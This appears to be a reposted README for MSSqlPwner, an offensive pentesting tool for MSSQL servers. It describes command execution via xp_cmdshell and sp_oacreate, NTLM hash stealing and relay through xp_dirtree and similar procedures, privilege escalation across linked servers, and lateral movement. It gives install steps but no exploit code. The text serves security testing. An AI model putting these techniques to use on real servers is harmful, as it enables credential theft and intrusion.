MSSqlPwner – An Advanced And Versatile Pentesting Tool Designed To Seamlessly Interact With MSSQL Servers And Based On Impacket

f96a30fda32a08e274e07366cd47bf963f779a1f2987e4c7f93b3f2ba669c0c3


MSSqlPwner is an advanced and versatile pentesting tool designed to seamlessly interact with MSSQL servers and based on Impacket. The MSSqlPwner tool empowers ethical hackers and security professionals to conduct comprehensive security assessments on MSSQL environments.

With MSSqlPwner, users can execute custom commands through various methods, including custom assembly, xp_cmdshell, and sp_oacreate(Ole Automation Procedures) and much more.

The tool starts with recursive enumeration on linked servers and gather all the possible chains.

Also, the MSSqlPwner tool can be used for NTLM relay capabilities, utilizing functions such as xp_dirtree, xp_subdirs, xp_fileexist, and command execution.

This tool provide opportunities for lateral movement assessments and exploration of linked servers.

If the authenticated MSSQL user does not have permission to execute certain operations, the tool can find a chain that might allow the execution. For example, it can send a query to a linked server that returns back with a link to the authenticated MSSQL service with higher permissions. The tool also supports recursive querying via links to execute queries and commands on otherwise inaccessible linked servers directed from the compromised MSSQL service.

This tool is supported by multiple authentication methods and described below.


Disclaimer

This tool is designed for security professionals and researchers for testing purposes only and should not be used for illegal purposes.

Functionalities:

  1. Command Execution: Execute commands using the following functions:
  • xp_cmdshell on local server or on linked servers
  • sp_oacreate (Ole Automation Procedures) on local server or on linked servers
  1. NTLM Hash Stealing and Relay: Issue NTLM relay or steal NTLM hashes using the following functions:
  • xp_dirtree on local server or on linked servers
  • xp_subdirs on local server or on linked servers
  • xp_fileexist on local server or on linked servers
  1. Encapsulated Commands and Queries: Execute incapsulated commands or queries using the following options:
  • execute_command on local server or on linked servers
  • run_query on local server or on linked servers
  • run_query_system_service on local server or on linked servers as system user
  1. Direct Queries
  • direct_query – execute direct queries on local or linked servers as system user.

Lateral Movement and Chain Exploration:

MSSqlPwner provides opportunities for lateral movement assessments and exploration of linked servers. In scenarios where the current session lacks administrative privileges, the tool attempts to find a chain that escalates its own privileges via linked servers. If a session on a linked server has higher privileges, the tool can interact with the linked server and perform a linked query back to the host with elevated privileges, enabling lateral movement with the target server.

Authentication Methods:

Supported by multiple authentication methods, including:

  • Windows credentials
  • MSSQL credentials
  • Kerberos authentication
  • Kerberos tickets
  • NTLM Hashes

The tool adapts to various scenarios and environments, verifying the effectiveness of authentication mechanisms.

Take your MSSQL environment assessments to the next level with the power and versatility of MSSqlPwner. Discover new possibilities for lateral movement, stealthy querying, and precise security evaluations with this the MSSqlPwner tool.

Installation

git clone https://github.com/El3ct71k/MSSqlPwner
cd MSSqlPwner
pip3 install -r requirements.txt
python3 MSSqlPwner.py

Usage

Thanks
  • Kim Dvash for designing this incredible logo.



A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

 To keep up to date follow us on the below channels.